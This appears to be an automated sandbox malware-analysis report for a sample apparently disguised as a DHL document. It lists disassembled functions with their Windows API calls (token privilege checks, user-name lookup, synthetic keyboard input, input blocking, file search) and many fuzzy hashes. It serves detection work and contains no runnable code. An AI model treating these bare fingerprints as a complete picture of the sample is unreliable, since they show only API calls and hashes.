Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6592e938a12926a7f77b731248b9bbf6cf7ebf4c2e853f2f921ba21cd22b0902
Instruction ID: c3a6de0898bc2dd5130a95721135d1e1d813886a57759150215957d6bb6830ea
Opcode Fuzzy Hash: 6592e938a12926a7f77b731248b9bbf6cf7ebf4c2e853f2f921ba21cd22b0902
Instruction Fuzzy Hash: 06115A71E01328BFDB108B94AC44BAFBFBCEB45B60F108111F914A7290C2704A019BE1

Function 00F21663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F2168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F216A1
FreeSid.ADVAPI32(?), ref: 00F216B1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d3c97cacc040dd460e8f1643e3d4c6b237c6c3a969c702019ab738576c125e6f
Instruction ID: 46b4840c9a29ef84a9765a9324bcf0f362f218d03ac8fa094ea57d2e3ade922c
Opcode Fuzzy Hash: d3c97cacc040dd460e8f1643e3d4c6b237c6c3a969c702019ab738576c125e6f
Instruction Fuzzy Hash: F8F0F47195030DFFDB00DFE49C89AAEBBBCFB08615F504565E601E2181E774AA449A94

Function 00F1D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00F1D28C

Strings

X64, xrefs: 00F1D2A8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 5cd7279d3f0a00cdaf67c3cffc112a5d96e7eb9658911bce594b7f4051ed5825
Instruction ID: 01fa8931029586c772b6a5b97c9d4dfbd1a3ee31a2df6de1c4900a2e5bf76e3f
Opcode Fuzzy Hash: 5cd7279d3f0a00cdaf67c3cffc112a5d96e7eb9658911bce594b7f4051ed5825
Instruction Fuzzy Hash: 92D0C9B580521DEECF94CB90DC88DD9B3BCFB04305F100152F106E2140D77495499F10

Function 00EECAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 1954aa55d6fd906a5e8102a8e95c4a958df42c09f242f6e0ec56695762a7c76d
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 74021C71E002599BDF14CFA9C8806ADFBF1EF48314F259169E919F7384D731AA42CB94

Function 00F368EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F36918
FindClose.KERNEL32(00000000), ref: 00F36961

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 9c2320e788065cf22502d10f95a2aeb3144a82eb7aa71765a3c79b0cbf6eb580
Instruction ID: edcc6c9c9216ce145b658d6369231b83ffa1f9ed8718120cff1ad8a4183a1bdd
Opcode Fuzzy Hash: 9c2320e788065cf22502d10f95a2aeb3144a82eb7aa71765a3c79b0cbf6eb580
Instruction Fuzzy Hash: 96118E31604200AFC710DF29D484B16BBE5EF85339F15C69DE5699F6A2C731EC06DB91

Function 00F337B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F44891,?,?,00000035,?), ref: 00F337E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F44891,?,?,00000035,?), ref: 00F337F4

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8998b97040181d0aaadea43af597f41fbb812974dc8c4ff8bcf2532f405c5f3c
Instruction ID: d3ddb1c0d78c3c4a68f5b854c6b9e2581c4f70b8c5d4a8202c8ae1fe057abb28
Opcode Fuzzy Hash: 8998b97040181d0aaadea43af597f41fbb812974dc8c4ff8bcf2532f405c5f3c
Instruction Fuzzy Hash: B5F0E5B16043292AEB2057668C4DFEB7AAEEFC4772F000165F609E2291D9609904D7F0

Function 00F2B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F2B25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00F2B270

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 2746d18589a04c0a218c937ac6f05b8c40695b8cdd8a0b49e243999eaaefeb36
Instruction ID: 01c9745654839bfc111a7a40db94e7ee110095c2c2a4d2992f7dfde69d5b09af
Opcode Fuzzy Hash: 2746d18589a04c0a218c937ac6f05b8c40695b8cdd8a0b49e243999eaaefeb36
Instruction Fuzzy Hash: 7FF01D7180434DAFDB059FA0D805BAE7FB4FF08315F048009FA55A5192D7798611EF94

Function 00F210BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F211FC), ref: 00F210D4
CloseHandle.KERNEL32(?,?,00F211FC), ref: 00F210E9

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 341d1ae4f617b6443652e34e8e8824d14bdffd1a8699a18274d0e72c62e67203
Instruction ID: 2074b94a8f2f4be4b86e8ae736042863a1f4830ca5b9e9c7a3810092e41816d7
Opcode Fuzzy Hash: 341d1ae4f617b6443652e34e8e8824d14bdffd1a8699a18274d0e72c62e67203
Instruction Fuzzy Hash: EAE04F32004710AEF7256B51FC05E7377E9EB04321B10882EF5A7804B1DB626C90EB50

Function 00ECCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00F10C40

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 5d56513f2ccd9dd3886c3035a3dd5fa57917ceff9f286399c5e1cfd497b03d80
Instruction ID: 83b5e57607435d9f7435de91b00e522636ac79a30578796157f043ee90b1b95f
Opcode Fuzzy Hash: 5d56513f2ccd9dd3886c3035a3dd5fa57917ceff9f286399c5e1cfd497b03d80
Instruction Fuzzy Hash: 72326C709002189BCF14DF90CA85FEDB7B5BF05318F24506DE80ABB292DB76AD86DB51

Function 00EF676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EF6766,?,?,00000008,?,?,00EFFEFE,00000000), ref: 00EF6998

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b2bc6243f22442120dcb365a508adac9e34911c89805ac9b7e277e33f1338a91
Instruction ID: 2bcf0080dc6b4dfb0f8b3a341ee1a158166bd772defc11b8c6bf08cea1024dde
Opcode Fuzzy Hash: b2bc6243f22442120dcb365a508adac9e34911c89805ac9b7e277e33f1338a91
Instruction Fuzzy Hash: C1B14C31610608DFDB19CF28C486BA57BE0FF45368F25965CE999DF2A2C335E991CB40

Function 00EDB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00F1851F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e4b3bfb410c63fb664fe5485b3cecc047c1fafc124e5f3f721b6216a6c0da4a1
Instruction ID: 7113c3a40e73f15f29db8d71e341d0cb242fc6034a17b5be6cfae362002b0467
Opcode Fuzzy Hash: e4b3bfb410c63fb664fe5485b3cecc047c1fafc124e5f3f721b6216a6c0da4a1
Instruction Fuzzy Hash: A1125D71D00229DBCB14CF58C981AEEB7F5FF48710F15819AE859EB251EB349E82DB90

Function 00F3EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00F3EABD

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: e1907faa3a6218e12b874c709d7f4a4a33718319c32d46778729052198f5de7e
Instruction ID: 163dbdb2b17d45078d4a256847f2dc6cb9e6e459c2858618ae225f3529d10bf4
Opcode Fuzzy Hash: e1907faa3a6218e12b874c709d7f4a4a33718319c32d46778729052198f5de7e
Instruction Fuzzy Hash: 17E04F322002059FC710EF59D805E9AF7EDAF98770F00841AFD4AD7391DB75E8419B90

Function 00EE09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00EE03EE), ref: 00EE09DA

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ec4c36d3996b1f457508e2e9c5583f87854221f34c136ee4767d151f39f8b744
Instruction ID: d02f2b2f92d904410ba0b03e6551977a4629998ee0c43bea2cc5ae563a0cb4a7
Opcode Fuzzy Hash: ec4c36d3996b1f457508e2e9c5583f87854221f34c136ee4767d151f39f8b744
Instruction Fuzzy Hash:

Function 00EE781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00EE798B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: f0ad20216dfa87e8848c5afb5c7a043b959b1a42f81d7569eeb528c3f5fa4a2a
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: DA51737160C6DD5ADB3C856B894A7BE23C98FA2308F183519D8CAF7283C612DE41D35A

Function 00EF6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822d021e56fddfb73c20d73b729141b099013a7c78af955c8e862c478447add6
Instruction ID: 63ec5f48e0d677a59d2d7adcd58ba117abd54748428b6c89964ac616b39a6580
Opcode Fuzzy Hash: 822d021e56fddfb73c20d73b729141b099013a7c78af955c8e862c478447add6
Instruction Fuzzy Hash: C6325522D29F094DD7639634CC22335A249AFB73C9F14E737F86AB59A9EB79C4835100

Function 00EDCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89ff3d5e31ecf48989bf6b0385d15d727979a63714bff16c9669cc26be70f8f
Instruction ID: ed4122e575db6e14ae85214ef3facaa3dc34478ce4e6b76eef801c1d124d8021
Opcode Fuzzy Hash: d89ff3d5e31ecf48989bf6b0385d15d727979a63714bff16c9669cc26be70f8f
Instruction Fuzzy Hash: 99322632A841568BCF28CE28C4A06FDB7A1EF45364F28816BD559DB391D235DDC2FB80

Function 00EC7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49c2fdaac954d4fd6c9b99be83a5032faa42dff92e8368984305556bd1824bf
Instruction ID: e1ee0f03e2090036ccc69ccbb37000d271d93722aee843a2294a4b31d29eefd9
Opcode Fuzzy Hash: f49c2fdaac954d4fd6c9b99be83a5032faa42dff92e8368984305556bd1824bf
Instruction Fuzzy Hash: E322BD70A0060A9BDF14CFA4C981BEEB3F6FF44710F245129E856A7291EB769D12EF50

Function 00EC91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a4e3af41cc6d66981acf1efb691e8cd6a964b46338c732855c453d6e0d4729
Instruction ID: fa1ae90dff3576c23adfbfdee74c2ba4d8e540b9a5ec1ba861088cc25b63f1ad
Opcode Fuzzy Hash: b0a4e3af41cc6d66981acf1efb691e8cd6a964b46338c732855c453d6e0d4729
Instruction Fuzzy Hash: 6402A6B1E00209EBDB04DF54D941BAEB7F1FF44310F108569E816AB3D1EB359A51EB91

Function 00EF9EEE Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea15460153bba5314d80b6547e3948ca0653b535775c45b8901eaf821fa1047b
Instruction ID: f8ab1dc55aaf8630532d40d8bb858cb5fbc0a98bd254d6825227da0874213289
Opcode Fuzzy Hash: ea15460153bba5314d80b6547e3948ca0653b535775c45b8901eaf821fa1047b
Instruction Fuzzy Hash: 2FB10520D2AF444DD32396398832336B75CAFBB6D5F51D71BFC2A74E62EB2285835140

Function 00EE1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 7a1bd0bc96a649dee9a7d0192a9fc7640ea4e38329cc4517de7cca8069e6b408
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: ED9187722080E74ADB2D463B853407DFFE15A923A631A17DEE4F2EA1D1FE3489D4D620

Function 00EE19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 3ba1584363562c1655eb1e3a12b7e68d004a16db9885c5cd76164286d761c59f
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 959192722090EB4ADB2D427B847407DFFE15A923A531A27EED4F6EA1C1FE3485D4D620

